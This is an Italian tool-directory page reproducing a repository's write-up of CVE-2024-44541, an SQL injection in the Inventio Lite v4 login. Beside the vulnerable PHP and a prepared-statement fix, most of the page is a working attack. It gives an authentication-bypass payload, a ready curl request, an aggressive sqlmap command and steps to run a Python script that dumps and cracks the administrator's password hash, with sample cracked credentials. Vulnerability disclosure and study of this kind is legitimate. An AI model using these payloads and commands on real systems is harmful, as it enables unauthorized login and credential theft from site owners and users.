Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-44541 — Questo repository descrive una vulnerabilità di SQL Injection in Inventio Lite v4, inclusi i passaggi per lo sfruttamento e uno script Python per automatizzare l'attacco. Fornisce informazioni sul codice vulnerabile, le correzioni consigliate e come estrarre e decifrare le credenziali amministrative. | Kitploit
Strumenti/GitHubGitHub/pointedsec/cve-2024-44541
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo repository descrive una vulnerabilità di SQL Injection in Inventio Lite v4, inclusi i passaggi per lo sfruttamento e uno script Python per automatizzare l'attacco. Fornisce informazioni sul codice vulnerabile, le correzioni consigliate e come estrarre e decifrare le credenziali amministrative.

Condividi

CVE-2024-44541: Vulnerabilità di SQL Injection in Inventio Lite v4

Descrizione

Inventio Lite v4 è vulnerabile a SQL Injection (SQLi) nell'endpoint /action=processlogin. Questa vulnerabilità consente agli aggressori di iniettare query SQL Arbitrarie tramite il parametro username nelle richieste POST, portando potenzialmente ad accesso non autorizzato ed estrazione di dati.

Codice Vulnerabile

Il codice vulnerabile è il seguente:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Screenshot del Codice Vulnerabile: Vulnerable Code

Codice Corretto

Il problema è risolto utilizzando prepared statements:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

Sfruttamento

Payload per il Bypass dell'Autenticazione

Per sfruttare questa vulnerabilità, usa il seguente payload:

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

Esempio dell'attacco usando curl:

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

Esempio con SQLMap

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Script di Exploit

Per automatizzare lo sfruttamento e l'estrazione del nome utente e dell'hash della password dell'amministratore, puoi utilizzare lo script Python fornito, sqli.py.

Puoi clonare questo repository

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

Poi installa i requisiti con pip

root@kitploit:~
pip install -r requirements.txt

Modifica le seguenti variabili nello script come necessario:

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

Ed esegui lo script, che scaricherà il nome utente e l'hash dell'amministratore, e poi tenterà di crackare l'hash con il formato SHA1(MD5(password)).

Esempio di output:

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impatto

Riservatezza: Gli aggressori possono scaricare l'intero database, esponendo dati sensibili come credenziali utente e informazioni personali.

Integrità: Gli aggressori possono bypassare l'autenticazione e ottenere accesso amministrativo, permettendo loro di modificare o eliminare dati.

Riferimenti

  • Inventio Lite GitHub Repository
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

Crediti

Questa segnalazione di vulnerabilità è stata identificata da Andrés Del Cerro. Per ulteriori dettagli, contattami a [email protected]


Scarica lo strumento